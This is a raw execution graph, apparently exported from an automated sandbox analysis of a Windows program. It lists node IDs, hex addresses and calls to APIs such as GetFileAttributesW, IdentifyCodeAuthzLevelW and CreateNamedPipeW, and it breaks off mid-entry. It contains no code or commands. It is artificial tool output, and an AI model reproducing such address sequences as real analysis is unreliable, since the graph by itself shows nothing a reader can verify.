                                                                                                                                                                                execution_graph 156667 4c09230 156668 4c09258 156667->156668 156670 4c0c620 IdentifyCodeAuthzLevelW 156668->156670 156671 4c0c617 IdentifyCodeAuthzLevelW 156668->156671 156669 4c0a5ac 156670->156669 156671->156669 155892 789a888 155893 789a8a2 155892->155893 155894 789a8e0 155893->155894 155897 789b688 155893->155897 155901 789b698 155893->155901 155899 789b698 155897->155899 155898 789b6b9 155898->155894 155899->155898 155905 789b92f 155899->155905 155902 789b6b1 155901->155902 155903 789b92f 3 API calls 155902->155903 155904 789b6b9 155902->155904 155903->155902 155904->155894 155906 789b95e 155905->155906 155910 789bcc9 155906->155910 155918 789baf5 155906->155918 155925 8b34c99 155910->155925 155932 8b34dde 155910->155932 155936 8b354e8 155910->155936 155940 8b34f2a 155910->155940 155944 8b34f86 155910->155944 155948 8b34ca8 155910->155948 155911 789b991 155911->155899 155919 789bb1e 155918->155919 155923 789b688 3 API calls 155919->155923 155924 789b698 3 API calls 155919->155924 155920 789bb6c 156108 789c010 155920->156108 155921 789bb7e 155921->155921 155923->155920 155924->155920 155926 8b34ca8 155925->155926 155928 8b34d13 155926->155928 155955 8b342f8 155926->155955 155960 8b34308 155926->155960 155927 8b35183 155927->155911 155928->155927 155965 8b3d994 155928->155965 155933 8b34dee 155932->155933 155934 8b35183 155933->155934 155935 8b3d994 2 API calls 155933->155935 155934->155911 155935->155934 155937 8b3548c 155936->155937 155938 8b35499 155936->155938 155937->155938 155939 8b3d994 2 API calls 155937->155939 155938->155911 155939->155938 155942 8b34e8a 155940->155942 155941 8b35183 155941->155911 155942->155941 155943 8b3d994 2 API calls 155942->155943 155943->155941 155946 8b34f6b 155944->155946 155945 8b35183 155945->155911 155946->155945 155947 8b3d994 2 API calls 155946->155947 155947->155945 155949 8b34cdc 155948->155949 155951 8b34d13 155949->155951 155953 8b342f8 IdentifyCodeAuthzLevelW 155949->155953 155954 8b34308 IdentifyCodeAuthzLevelW 155949->155954 155950 8b35183 155950->155911 155951->155950 155952 8b3d994 2 API calls 155951->155952 155952->155950 155953->155951 155954->155951 155956 8b34308 155955->155956 155968 8b34192 155956->155968 155973 8b341a0 155956->155973 155957 8b3434d 155957->155957 155961 8b34335 155960->155961 155963 8b34192 IdentifyCodeAuthzLevelW 155961->155963 155964 8b341a0 IdentifyCodeAuthzLevelW 155961->155964 155962 8b3434d 155962->155962 155963->155962 155964->155962 156038 8b3e40a 155965->156038 155966 8b3d9a1 155969 8b341c9 155968->155969 155970 8b341f7 155968->155970 155969->155970 155978 4c0c620 155969->155978 155983 4c0c617 155969->155983 155970->155957 155974 8b341c9 155973->155974 155975 8b341f7 155973->155975 155974->155975 155976 4c0c620 IdentifyCodeAuthzLevelW 155974->155976 155977 4c0c617 IdentifyCodeAuthzLevelW 155974->155977 155975->155957 155976->155975 155977->155975 155980 4c0c643 155978->155980 155979 4c0c6c7 155979->155970 155980->155979 155988 4c0c830 155980->155988 155996 4c0c820 155980->155996 155984 4c0c620 155983->155984 155985 4c0c6c7 155984->155985 155986 4c0c820 IdentifyCodeAuthzLevelW 155984->155986 155987 4c0c830 IdentifyCodeAuthzLevelW 155984->155987 155985->155970 155986->155985 155987->155985 155995 4c0c844 155988->155995 155989 4c0c84b 155989->155979 155995->155989 156005 4c0d080 155995->156005 156010 4c0d1a5 155995->156010 156015 4c0d1d3 155995->156015 156020 4c0d1bc 155995->156020 156025 4c0d071 155995->156025 155997 4c0c7b7 155996->155997 156004 4c0c82f 155996->156004 155997->155979 155998 4c0c84b 155998->155979 155999 4c0d080 IdentifyCodeAuthzLevelW 155999->155998 156000 4c0d071 IdentifyCodeAuthzLevelW 156000->155998 156001 4c0d1d3 IdentifyCodeAuthzLevelW 156001->155998 156002 4c0d1a5 IdentifyCodeAuthzLevelW 156002->155998 156003 4c0d1bc IdentifyCodeAuthzLevelW 156003->155998 156004->155998 156004->155999 156004->156000 156004->156001 156004->156002 156004->156003 156007 4c0d0a4 156005->156007 156006 4c0d0ef 156006->155989 156007->156006 156031 4c0e500 156007->156031 156035 4c0e510 156007->156035 156012 4c0d122 156010->156012 156011 4c0d253 156011->155989 156013 4c0e500 IdentifyCodeAuthzLevelW 156012->156013 156014 4c0e510 IdentifyCodeAuthzLevelW 156012->156014 156013->156011 156014->156011 156016 4c0d122 156015->156016 156018 4c0e500 IdentifyCodeAuthzLevelW 156016->156018 156019 4c0e510 IdentifyCodeAuthzLevelW 156016->156019 156017 4c0d253 156017->155989 156018->156017 156019->156017 156022 4c0d122 156020->156022 156021 4c0d253 156021->155989 156023 4c0e500 IdentifyCodeAuthzLevelW 156022->156023 156024 4c0e510 IdentifyCodeAuthzLevelW 156022->156024 156023->156021 156024->156021 156026 4c0d007 156025->156026 156028 4c0d07f 156025->156028 156026->156026 156027 4c0d0ef 156027->155989 156028->156027 156029 4c0e500 IdentifyCodeAuthzLevelW 156028->156029 156030 4c0e510 IdentifyCodeAuthzLevelW 156028->156030 156029->156027 156030->156027 156032 4c0e505 156031->156032 156034 4c0e531 IdentifyCodeAuthzLevelW 156032->156034 156033 4c0e51e 156033->156006 156034->156033 156037 4c0e531 IdentifyCodeAuthzLevelW 156035->156037 156036 4c0e51e 156036->156006 156037->156036 156039 8b3e42a 156038->156039 156043 8b3ef69 156039->156043 156049 8b3eefb 156039->156049 156040 8b3e434 156040->155966 156044 8b3ef72 156043->156044 156045 8b3eefd 156043->156045 156044->156040 156046 8b3ef06 156045->156046 156053 8c910f7 156045->156053 156058 8c91108 156045->156058 156046->156040 156051 8c91108 2 API calls 156049->156051 156052 8c910f7 2 API calls 156049->156052 156050 8b3ef06 156050->156040 156051->156050 156052->156050 156055 8c91108 156053->156055 156054 8c911ae 156054->156046 156055->156054 156064 8c92680 156055->156064 156072 8c92670 156055->156072 156059 8c91131 156058->156059 156060 8c91393 156058->156060 156061 8c911ae 156059->156061 156062 8c92680 2 API calls 156059->156062 156063 8c92670 2 API calls 156059->156063 156061->156046 156062->156061 156063->156061 156066 8c926a8 156064->156066 156065 8c9281e 156068 8c92838 156065->156068 156084 8c93619 156065->156084 156092 8c93470 156065->156092 156100 8c93461 156065->156100 156066->156065 156080 8c90af8 156066->156080 156075 8c926a8 156072->156075 156073 8c9281e 156076 8c92838 156073->156076 156077 8c93619 GetFileAttributesW 156073->156077 156078 8c93461 GetFileAttributesW 156073->156078 156079 8c93470 GetFileAttributesW 156073->156079 156074 8c90af8 SetThreadUILanguage 156074->156073 156075->156073 156075->156074 156077->156076 156078->156076 156079->156076 156081 8c92dc0 SetThreadUILanguage 156080->156081 156083 8c92e31 156081->156083 156083->156065 156085 8c93627 156084->156085 156087 8c93f68 GetFileAttributesW 156085->156087 156088 8c93f5a GetFileAttributesW 156085->156088 156089 8c93ffc GetFileAttributesW 156085->156089 156090 8c9412f GetFileAttributesW 156085->156090 156091 8c942cf GetFileAttributesW 156085->156091 156086 8c936ff 156087->156086 156088->156086 156089->156086 156090->156086 156091->156086 156093 8c934ac 156092->156093 156095 8c93f68 GetFileAttributesW 156093->156095 156096 8c93f5a GetFileAttributesW 156093->156096 156097 8c93ffc GetFileAttributesW 156093->156097 156098 8c9412f GetFileAttributesW 156093->156098 156099 8c942cf GetFileAttributesW 156093->156099 156094 8c936ff 156094->156094 156095->156094 156096->156094 156097->156094 156098->156094 156099->156094 156101 8c934ac 156100->156101 156103 8c93f68 GetFileAttributesW 156101->156103 156104 8c93f5a GetFileAttributesW 156101->156104 156105 8c93ffc GetFileAttributesW 156101->156105 156106 8c9412f GetFileAttributesW 156101->156106 156107 8c942cf GetFileAttributesW 156101->156107 156102 8c936ff 156102->156102 156103->156102 156104->156102 156105->156102 156106->156102 156107->156102 156111 789c5a6 156108->156111 156112 789c5af 156111->156112 156116 789cad0 156112->156116 156123 789cac2 156112->156123 156113 789c02b 156113->155921 156117 789cadf 156116->156117 156119 789caeb 156116->156119 156130 789d350 156117->156130 156137 789d31f 156117->156137 156144 789d55a 156117->156144 156118 789cae7 156118->156113 156119->156113 156124 789cadf 156123->156124 156126 789caeb 156123->156126 156127 789d55a GetFileAttributesW 156124->156127 156128 789d31f GetFileAttributesW 156124->156128 156129 789d350 GetFileAttributesW 156124->156129 156125 789cae7 156125->156113 156126->156113 156127->156125 156128->156125 156129->156125 156131 789d37a 156130->156131 156132 789d645 156130->156132 156133 789d3f7 156131->156133 156148 87e6b90 156131->156148 156154 87e6b80 156131->156154 156132->156118 156133->156132 156160 8b33eb9 156133->156160 156138 789d32d 156137->156138 156139 789d645 156138->156139 156140 789d3f7 156138->156140 156141 87e6b90 GetFileAttributesW 156138->156141 156142 87e6b80 GetFileAttributesW 156138->156142 156139->156118 156140->156139 156143 8b33eb9 GetFileAttributesW 156140->156143 156141->156140 156142->156140 156143->156139 156145 789d564 156144->156145 156146 789d645 156145->156146 156147 8b33eb9 GetFileAttributesW 156145->156147 156146->156118 156147->156146 156149 87e6b94 156148->156149 156166 8b56447 156149->156166 156173 8b56370 156149->156173 156180 8b56380 156149->156180 156150 87e6d5c 156150->156133 156155 87e6b84 156154->156155 156157 8b56447 GetFileAttributesW 156155->156157 156158 8b56380 GetFileAttributesW 156155->156158 156159 8b56370 GetFileAttributesW 156155->156159 156156 87e6d5c 156156->156133 156157->156156 156158->156156 156159->156156 156161 8b33ec1 156160->156161 156163 8b56447 GetFileAttributesW 156161->156163 156164 8b56380 GetFileAttributesW 156161->156164 156165 8b56370 GetFileAttributesW 156161->156165 156162 8b33f32 156162->156132 156163->156162 156164->156162 156165->156162 156168 8b5644c 156166->156168 156167 8b5652f 156167->156150 156168->156167 156187 8b5a2cc 156168->156187 156191 8b5a1b9 156168->156191 156195 8b5a021 156168->156195 156199 8b5a55c 156168->156199 156175 8b563b1 156173->156175 156174 8b5652f 156174->156150 156175->156174 156176 8b5a021 GetFileAttributesW 156175->156176 156177 8b5a2cc GetFileAttributesW 156175->156177 156178 8b5a55c GetFileAttributesW 156175->156178 156179 8b5a1b9 GetFileAttributesW 156175->156179 156176->156174 156177->156174 156178->156174 156179->156174 156182 8b563b1 156180->156182 156181 8b5652f 156181->156150 156182->156181 156183 8b5a021 GetFileAttributesW 156182->156183 156184 8b5a2cc GetFileAttributesW 156182->156184 156185 8b5a55c GetFileAttributesW 156182->156185 156186 8b5a1b9 GetFileAttributesW 156182->156186 156183->156181 156184->156181 156185->156181 156186->156181 156188 8b5a2d4 156187->156188 156190 8b59c81 GetFileAttributesW 156188->156190 156189 8b5a348 156189->156167 156190->156189 156192 8b5a1be 156191->156192 156193 8b5a27f 156192->156193 156194 8b59c81 GetFileAttributesW 156192->156194 156193->156167 156194->156193 156196 8b5a03c 156195->156196 156197 8b5a27f 156196->156197 156198 8b59c81 GetFileAttributesW 156196->156198 156197->156167 156198->156197 156200 8b5a21f 156199->156200 156201 8b5a27f 156200->156201 156202 8b59c81 GetFileAttributesW 156200->156202 156201->156167 156202->156201 156203 8b94ffb 156205 8b9501e 156203->156205 156204 8b95216 156205->156204 156210 8b99760 156205->156210 156215 8b99770 156205->156215 156220 8b994c0 156205->156220 156226 8b99412 156205->156226 156211 8b99770 156210->156211 156232 8b99c08 156211->156232 156236 8b99bf8 156211->156236 156212 8b997f1 156216 8b9979d 156215->156216 156218 8b99bf8 GetFileAttributesW 156216->156218 156219 8b99c08 GetFileAttributesW 156216->156219 156217 8b997f1 156218->156217 156219->156217 156221 8b994d2 156220->156221 156223 8b994e4 156221->156223 156224 8b99bf8 GetFileAttributesW 156221->156224 156225 8b99c08 GetFileAttributesW 156221->156225 156222 8b997f1 156223->156205 156224->156222 156225->156222 156227 8b99420 156226->156227 156229 8b9947b 156227->156229 156230 8b99bf8 GetFileAttributesW 156227->156230 156231 8b99c08 GetFileAttributesW 156227->156231 156228 8b997f1 156229->156205 156230->156228 156231->156228 156233 8b99c1c 156232->156233 156234 8b99c60 156233->156234 156241 4c065d8 156233->156241 156234->156212 156237 8b99bd3 156236->156237 156238 8b99c02 156236->156238 156237->156212 156239 8b99c60 156238->156239 156240 4c065d8 GetFileAttributesW 156238->156240 156239->156212 156240->156239 156245 4c06a40 156241->156245 156250 4c06a30 156241->156250 156242 4c06602 156242->156234 156246 4c06a58 156245->156246 156247 4c06a6d 156246->156247 156255 4c047ec 156246->156255 156247->156242 156251 4c06a58 156250->156251 156252 4c06a6d 156251->156252 156253 4c047ec GetFileAttributesW 156251->156253 156252->156242 156254 4c06a9e 156253->156254 156254->156242 156256 4c06e88 GetFileAttributesW 156255->156256 156258 4c06a9e 156256->156258 156258->156242 156621 8ddacb8 156622 8ddacdb 156621->156622 156627 8ddab20 156622->156627 156632 8ddab10 156622->156632 156637 8ddab81 156622->156637 156623 8ddace4 156628 8ddab45 156627->156628 156629 8ddab70 156628->156629 156642 8b58020 156628->156642 156650 8b5800f 156628->156650 156629->156623 156633 8ddab20 156632->156633 156634 8ddab70 156633->156634 156635 8b58020 GetFileAttributesW 156633->156635 156636 8b5800f GetFileAttributesW 156633->156636 156634->156623 156635->156633 156636->156633 156638 8ddab4c 156637->156638 156639 8ddab70 156638->156639 156640 8b58020 GetFileAttributesW 156638->156640 156641 8b5800f GetFileAttributesW 156638->156641 156639->156623 156640->156638 156641->156638 156648 4c06a40 GetFileAttributesW 156642->156648 156649 4c06a30 GetFileAttributesW 156642->156649 156643 8b58040 156643->156628 156644 8b5803a 156644->156643 156646 8b58020 GetFileAttributesW 156644->156646 156647 8b5800f GetFileAttributesW 156644->156647 156645 8b5808c 156645->156628 156646->156645 156647->156645 156648->156644 156649->156644 156652 8b5803a 156650->156652 156656 4c06a40 GetFileAttributesW 156650->156656 156657 4c06a30 GetFileAttributesW 156650->156657 156651 8b58040 156651->156628 156652->156651 156654 8b58020 GetFileAttributesW 156652->156654 156655 8b5800f GetFileAttributesW 156652->156655 156653 8b5808c 156653->156628 156654->156653 156655->156653 156656->156652 156657->156652 156259 8de6408 156261 8de6432 156259->156261 156260 8de65c6 156261->156260 156263 8de5d10 156261->156263 156264 8de5d48 156263->156264 156266 8de5d4c 156264->156266 156270 8de582f 156264->156270 156278 8de5840 156264->156278 156265 8de5ded 156286 8de5798 156265->156286 156266->156261 156271 8de5854 156270->156271 156289 8b3e9f2 156271->156289 156294 8b3ea00 156271->156294 156272 8de587e 156273 8de58b2 156272->156273 156299 8b3d180 156272->156299 156308 8b3d16f 156272->156308 156273->156265 156279 8de5854 156278->156279 156284 8b3e9f2 IdentifyCodeAuthzLevelW 156279->156284 156285 8b3ea00 IdentifyCodeAuthzLevelW 156279->156285 156280 8de587e 156281 8de58b2 156280->156281 156282 8b3d180 GetFileAttributesW 156280->156282 156283 8b3d16f GetFileAttributesW 156280->156283 156281->156265 156282->156281 156283->156281 156284->156280 156285->156280 156348 8de56f0 156286->156348 156290 8b3ea1b 156289->156290 156292 8b3ea79 156290->156292 156317 8b3e9a0 156290->156317 156292->156272 156295 8b3ea1b 156294->156295 156297 8b3ea79 156295->156297 156298 8b3e9a0 IdentifyCodeAuthzLevelW 156295->156298 156296 8b3ea72 156296->156272 156297->156272 156298->156296 156300 8b3d2d0 156299->156300 156302 8b3d19c 156299->156302 156301 8b3d1cc 156300->156301 156306 8b3d180 GetFileAttributesW 156300->156306 156307 8b3d16f GetFileAttributesW 156300->156307 156301->156273 156302->156301 156321 8b3c888 156302->156321 156325 8b3c878 156302->156325 156303 8b3d39e 156306->156303 156307->156303 156309 8b3d2d0 156308->156309 156311 8b3d19c 156308->156311 156310 8b3d1cc 156309->156310 156315 8b3d180 GetFileAttributesW 156309->156315 156316 8b3d16f GetFileAttributesW 156309->156316 156310->156273 156311->156310 156313 8b3c888 GetFileAttributesW 156311->156313 156314 8b3c878 GetFileAttributesW 156311->156314 156312 8b3d39e 156313->156310 156314->156310 156315->156312 156316->156312 156319 4c0c620 IdentifyCodeAuthzLevelW 156317->156319 156320 4c0c617 IdentifyCodeAuthzLevelW 156317->156320 156318 8b3e9ac 156318->156272 156319->156318 156320->156318 156322 8b3c8c6 156321->156322 156323 8b3c913 156322->156323 156329 4c04958 156322->156329 156323->156301 156326 8b3c888 156325->156326 156327 8b3c913 156326->156327 156328 4c04958 GetFileAttributesW 156326->156328 156327->156301 156328->156327 156331 4c04972 156329->156331 156330 4c04997 156330->156323 156331->156330 156334 4c04a10 156331->156334 156338 4c04a20 156331->156338 156335 4c04a33 156334->156335 156342 4c04a88 156335->156342 156339 4c04a33 156338->156339 156341 4c04a88 GetFileAttributesW 156339->156341 156340 4c04a51 156340->156330 156341->156340 156344 4c04aad 156342->156344 156343 4c04a51 156343->156330 156344->156343 156345 4c04b73 156344->156345 156346 4c065d8 GetFileAttributesW 156344->156346 156345->156343 156347 4c065d8 GetFileAttributesW 156345->156347 156346->156345 156347->156343 156349 8de570e 156348->156349 156353 8de5111 156349->156353 156361 8de5120 156349->156361 156350 8de5724 156350->156266 156354 8de511a 156353->156354 156369 8d62c20 156354->156369 156374 8d62c10 156354->156374 156355 8de5149 156379 8de49e0 156355->156379 156384 8de49d0 156355->156384 156356 8de515e 156356->156350 156362 8de5122 156361->156362 156367 8d62c10 IdentifyCodeAuthzLevelW 156362->156367 156368 8d62c20 IdentifyCodeAuthzLevelW 156362->156368 156363 8de5149 156365 8de49d0 GetFileAttributesW 156363->156365 156366 8de49e0 GetFileAttributesW 156363->156366 156364 8de515e 156364->156350 156365->156364 156366->156364 156367->156363 156368->156363 156370 8d62c28 156369->156370 156371 8d62c73 156370->156371 156389 8b3b110 156370->156389 156394 8b3b100 156370->156394 156371->156355 156375 8d62c20 156374->156375 156376 8d62c73 156375->156376 156377 8b3b110 IdentifyCodeAuthzLevelW 156375->156377 156378 8b3b100 IdentifyCodeAuthzLevelW 156375->156378 156376->156355 156377->156376 156378->156376 156381 8de49f8 156379->156381 156380 8de4b2d 156380->156356 156381->156380 156399 8de4598 156381->156399 156386 8de49e0 156384->156386 156385 8de4b2d 156385->156356 156386->156385 156388 8de4598 GetFileAttributesW 156386->156388 156387 8de4d63 156388->156387 156390 8b3b135 156389->156390 156391 8b3b1ac 156389->156391 156392 4c0c620 IdentifyCodeAuthzLevelW 156390->156392 156393 4c0c617 IdentifyCodeAuthzLevelW 156390->156393 156391->156371 156392->156391 156393->156391 156395 8b3b110 156394->156395 156396 8b3b1ac 156395->156396 156397 4c0c620 IdentifyCodeAuthzLevelW 156395->156397 156398 4c0c617 IdentifyCodeAuthzLevelW 156395->156398 156396->156371 156397->156396 156398->156396 156400 8de45b0 156399->156400 156403 8de4510 156400->156403 156404 8de4524 156403->156404 156408 8de4268 156404->156408 156412 8de4262 156404->156412 156405 8de4578 156409 8de4290 156408->156409 156410 8de4328 156409->156410 156417 8de422a 156409->156417 156410->156405 156413 8de41ef 156412->156413 156414 8de4267 156412->156414 156415 8de4328 156414->156415 156416 8de422a GetFileAttributesW 156414->156416 156415->156405 156416->156415 156418 8de4230 156417->156418 156419 8de423b 156417->156419 156422 8de35d8 156418->156422 156431 8de4110 156418->156431 156419->156410 156423 8de3609 156422->156423 156424 8de3673 156423->156424 156425 8de40d1 156423->156425 156427 8de3618 156423->156427 156429 8de31f8 GetFileAttributesW 156424->156429 156430 8de3208 GetFileAttributesW 156424->156430 156425->156425 156428 8de35d8 GetFileAttributesW 156425->156428 156426 8de416e 156426->156419 156427->156419 156428->156426 156429->156427 156430->156427 156432 8de416e 156431->156432 156433 8de35d8 GetFileAttributesW 156431->156433 156432->156419 156433->156432 156672 8b5ca82 156673 8b5cab6 156672->156673 156674 8b5cb5a 156673->156674 156677 8b5b350 156673->156677 156684 8b5b33f 156673->156684 156678 8b5b374 156677->156678 156691 8b5b1a0 156678->156691 156697 8b5ae40 156678->156697 156709 8b5ae90 156678->156709 156720 8b5b190 156678->156720 156679 8b5b385 156679->156674 156685 8b5b374 156684->156685 156687 8b5ae90 GetFileAttributesW 156685->156687 156688 8b5ae40 GetFileAttributesW 156685->156688 156689 8b5b1a0 GetFileAttributesW 156685->156689 156690 8b5b190 GetFileAttributesW 156685->156690 156686 8b5b385 156686->156674 156687->156686 156688->156686 156689->156686 156690->156686 156692 8b5b1b6 156691->156692 156693 8b5b2cb 156691->156693 156692->156679 156695 8b5ae90 GetFileAttributesW 156693->156695 156696 8b5ae40 GetFileAttributesW 156693->156696 156694 8b5b31e 156694->156679 156695->156694 156696->156694 156698 8b5ae56 156697->156698 156699 8b5ae5f 156697->156699 156698->156679 156700 8b5aed7 156699->156700 156702 8b5b16c 156699->156702 156707 4c06a40 GetFileAttributesW 156700->156707 156708 4c06a30 GetFileAttributesW 156700->156708 156701 8b5aeff 156701->156679 156703 8b5b1b6 156702->156703 156705 8b5ae90 GetFileAttributesW 156702->156705 156706 8b5ae40 GetFileAttributesW 156702->156706 156703->156679 156704 8b5b31e 156704->156679 156705->156704 156706->156704 156707->156701 156708->156701 156710 8b5aebb 156709->156710 156711 8b5aed7 156710->156711 156712 8b5b16c 156710->156712 156716 4c06a40 GetFileAttributesW 156711->156716 156717 4c06a30 GetFileAttributesW 156711->156717 156714 8b5b1b6 156712->156714 156718 8b5ae90 GetFileAttributesW 156712->156718 156719 8b5ae40 GetFileAttributesW 156712->156719 156713 8b5b31e 156713->156679 156714->156679 156715 8b5aeff 156715->156679 156716->156715 156717->156715 156718->156713 156719->156713 156721 8b5b2cb 156720->156721 156723 8b5b1b6 156720->156723 156724 8b5ae90 GetFileAttributesW 156721->156724 156725 8b5ae40 GetFileAttributesW 156721->156725 156722 8b5b31e 156722->156679 156723->156679 156724->156722 156725->156722 156658 4c017e8 156659 4c017fa 156658->156659 156661 4c04958 GetFileAttributesW 156659->156661 156660 4c0182a 156661->156660 156726 789d7f0 156727 789d803 156726->156727 156731 789d860 156727->156731 156735 789d868 156727->156735 156728 789d847 156732 789d88b 156731->156732 156733 789d8cb 156732->156733 156739 789da50 156732->156739 156736 789d88b 156735->156736 156737 789d8cb 156736->156737 156738 789da50 CreateNamedPipeW 156736->156738 156738->156737 156740 789da64 156739->156740 156744 789ec88 156740->156744 156750 789ec78 156740->156750 156741 789da91 156741->156733 156745 789eca1 156744->156745 156747 789ed0a 156745->156747 156756 789f3b0 156745->156756 156760 789f3c0 156745->156760 156746 789ecfd 156746->156741 156747->156741 156751 789eca1 156750->156751 156753 789ed0a 156751->156753 156754 789f3b0 CreateNamedPipeW 156751->156754 156755 789f3c0 CreateNamedPipeW 156751->156755 156752 789ecfd 156752->156741 156753->156741 156754->156752 156755->156752 156758 789f3b4 156756->156758 156759 789f4f0 156758->156759 156764 789f06c 156758->156764 156759->156746 156761 789f3c4 156760->156761 156762 789f4f0 156761->156762 156763 789f06c CreateNamedPipeW 156761->156763 156762->156746 156763->156762 156765 789f6a0 CreateNamedPipeW 156764->156765 156767 789f7d2 156765->156767 156767->156767 156768 8c92070 156769 8c9207c 156768->156769 156770 8c9209e 156768->156770 156769->156770 156771 8c92680 2 API calls 156769->156771 156772 8c92670 2 API calls 156769->156772 156771->156769 156772->156769 156662 8b3b498 156663 8b3b4bd 156662->156663 156664 8b3b4c6 156662->156664 156665 8b3b110 IdentifyCodeAuthzLevelW 156663->156665 156666 8b3b100 IdentifyCodeAuthzLevelW 156663->156666 156665->156664 156666->156664 156434 8de28c0 156435 8de2a01 156434->156435 156436 8de28ed 156434->156436 156436->156435 156439 8de2560 156436->156439 156440 8de257c 156439->156440 156441 8de25d5 156440->156441 156444 8de1832 156440->156444 156450 8de1840 156440->156450 156445 8de181d 156444->156445 156446 8de1837 156444->156446 156445->156440 156447 8de19e7 156446->156447 156455 8de117a 156446->156455 156462 8de1188 156446->156462 156447->156440 156451 8de1878 156450->156451 156452 8de19e7 156451->156452 156453 8de117a 2 API calls 156451->156453 156454 8de1188 2 API calls 156451->156454 156452->156440 156453->156452 156454->156452 156456 8de115f 156455->156456 156458 8de1182 156455->156458 156456->156447 156457 8de12f6 156457->156447 156459 8de123e 156458->156459 156468 8c92c28 156458->156468 156476 8c92c12 156458->156476 156459->156447 156464 8de11b6 156462->156464 156463 8de12f6 156463->156447 156465 8de123e 156464->156465 156466 8c92c28 2 API calls 156464->156466 156467 8c92c12 2 API calls 156464->156467 156465->156447 156466->156463 156467->156463 156469 8c92c35 156468->156469 156470 8c92c4d 156468->156470 156469->156470 156484 8c920a9 156469->156484 156489 8c920b8 156469->156489 156494 8c92249 156469->156494 156499 8c92374 156469->156499 156504 8c92380 156469->156504 156470->156457 156477 8c92c35 156476->156477 156478 8c92c4d 156476->156478 156477->156478 156479 8c920a9 2 API calls 156477->156479 156480 8c92249 2 API calls 156477->156480 156481 8c920b8 2 API calls 156477->156481 156482 8c92380 2 API calls 156477->156482 156483 8c92374 2 API calls 156477->156483 156478->156457 156479->156478 156480->156478 156481->156478 156482->156478 156483->156478 156485 8c920b8 156484->156485 156486 8c920f5 156485->156486 156509 8ddd138 156485->156509 156521 8ddd128 156485->156521 156486->156470 156490 8c920dd 156489->156490 156491 8c920f5 156490->156491 156492 8ddd138 2 API calls 156490->156492 156493 8ddd128 2 API calls 156490->156493 156491->156470 156492->156491 156493->156491 156495 8c92251 156494->156495 156496 8c92352 156495->156496 156497 8ddd138 2 API calls 156495->156497 156498 8ddd128 2 API calls 156495->156498 156496->156470 156497->156496 156498->156496 156500 8c92352 156499->156500 156501 8c92288 156499->156501 156500->156470 156501->156500 156502 8ddd138 2 API calls 156501->156502 156503 8ddd128 2 API calls 156501->156503 156502->156500 156503->156500 156505 8c92288 156504->156505 156506 8c92352 156504->156506 156505->156506 156507 8ddd138 2 API calls 156505->156507 156508 8ddd128 2 API calls 156505->156508 156506->156470 156507->156506 156508->156506 156510 8ddd166 156509->156510 156511 8ddd1c1 156510->156511 156533 8ddc701 156510->156533 156543 8ddc88f 156510->156543 156551 8ddc708 156510->156551 156512 8ddd36a 156512->156511 156513 8ddc88f 2 API calls 156512->156513 156514 8ddc708 2 API calls 156512->156514 156515 8ddc701 2 API calls 156512->156515 156561 8ddaf48 156512->156561 156567 8ddaf38 156512->156567 156513->156512 156514->156512 156515->156512 156523 8ddd138 156521->156523 156522 8ddd1c1 156522->156522 156523->156522 156530 8ddc88f 2 API calls 156523->156530 156531 8ddc708 2 API calls 156523->156531 156532 8ddc701 2 API calls 156523->156532 156524 8ddd36a 156524->156522 156525 8ddc88f 2 API calls 156524->156525 156526 8ddc708 2 API calls 156524->156526 156527 8ddc701 2 API calls 156524->156527 156528 8ddaf48 2 API calls 156524->156528 156529 8ddaf38 2 API calls 156524->156529 156525->156524 156526->156524 156527->156524 156528->156524 156529->156524 156530->156524 156531->156524 156532->156524 156535 8ddc73c 156533->156535 156536 8ddc72c 156533->156536 156534 8ddc735 156534->156512 156573 8ddc0be 156535->156573 156536->156534 156537 8ddb410 GetFileAttributesW 156536->156537 156538 8ddb6a3 GetFileAttributesW 156536->156538 156539 8ddb508 GetFileAttributesW 156536->156539 156540 8ddb6c6 GetFileAttributesW 156536->156540 156542 8ddc0be 2 API calls 156536->156542 156537->156536 156538->156536 156539->156536 156540->156536 156542->156536 156545 8ddc7b5 156543->156545 156544 8ddc90f 156544->156512 156545->156544 156546 8ddb508 GetFileAttributesW 156545->156546 156547 8ddb6c6 GetFileAttributesW 156545->156547 156548 8ddb410 GetFileAttributesW 156545->156548 156549 8ddb6a3 GetFileAttributesW 156545->156549 156550 8ddc0be 2 API calls 156545->156550 156546->156545 156547->156545 156548->156545 156549->156545 156550->156545 156553 8ddc73c 156551->156553 156554 8ddc72c 156551->156554 156552 8ddc735 156552->156512 156555 8ddc0be 2 API calls 156553->156555 156554->156552 156556 8ddc0be 2 API calls 156554->156556 156557 8ddb508 GetFileAttributesW 156554->156557 156558 8ddb6c6 GetFileAttributesW 156554->156558 156559 8ddb410 GetFileAttributesW 156554->156559 156560 8ddb6a3 GetFileAttributesW 156554->156560 156555->156554 156556->156554 156557->156554 156558->156554 156559->156554 156560->156554 156563 8ddaf70 156561->156563 156562 8ddafa3 156562->156512 156563->156562 156586 8dda778 156563->156586 156591 8dda788 156563->156591 156596 8dda9bd 156563->156596 156568 8ddaf70 156567->156568 156569 8ddafa3 156568->156569 156570 8dda9bd 2 API calls 156568->156570 156571 8dda788 2 API calls 156568->156571 156572 8dda778 2 API calls 156568->156572 156569->156512 156570->156569 156571->156569 156572->156569 156574 8ddc0c3 156573->156574 156575 8ddc15c 156574->156575 156578 8ddbe90 156574->156578 156582 8ddbea0 156574->156582 156575->156536 156579 8ddbea0 156578->156579 156580 8ddbf06 156579->156580 156581 8b3ef69 2 API calls 156579->156581 156580->156574 156581->156580 156583 8ddbeca 156582->156583 156584 8ddbf06 156583->156584 156585 8b3ef69 2 API calls 156583->156585 156584->156574 156585->156584 156588 8dda786 156586->156588 156587 8dda81e 156587->156562 156588->156587 156601 8dd64e0 156588->156601 156606 8dd64d1 156588->156606 156593 8dda7bb 156591->156593 156592 8dda81e 156592->156562 156593->156592 156594 8dd64d1 2 API calls 156593->156594 156595 8dd64e0 2 API calls 156593->156595 156594->156592 156595->156592 156597 8dda9c7 156596->156597 156598 8ddaa79 156597->156598 156599 8dd64d1 2 API calls 156597->156599 156600 8dd64e0 2 API calls 156597->156600 156598->156562 156599->156598 156600->156598 156602 8dd650c 156601->156602 156603 8dd6523 156602->156603 156611 8dd6310 156602->156611 156616 8dd6320 156602->156616 156608 8dd64de 156606->156608 156607 8dd6523 156608->156607 156609 8dd6310 2 API calls 156608->156609 156610 8dd6320 2 API calls 156608->156610 156609->156607 156610->156607 156612 8dd6346 156611->156612 156614 8dd3bfb GetFileAttributesW SetThreadUILanguage 156612->156614 156615 8dd3c10 GetFileAttributesW SetThreadUILanguage 156612->156615 156613 8dd648f 156613->156603 156614->156613 156615->156613 156617 8dd6346 156616->156617 156619 8dd3bfb GetFileAttributesW SetThreadUILanguage 156617->156619 156620 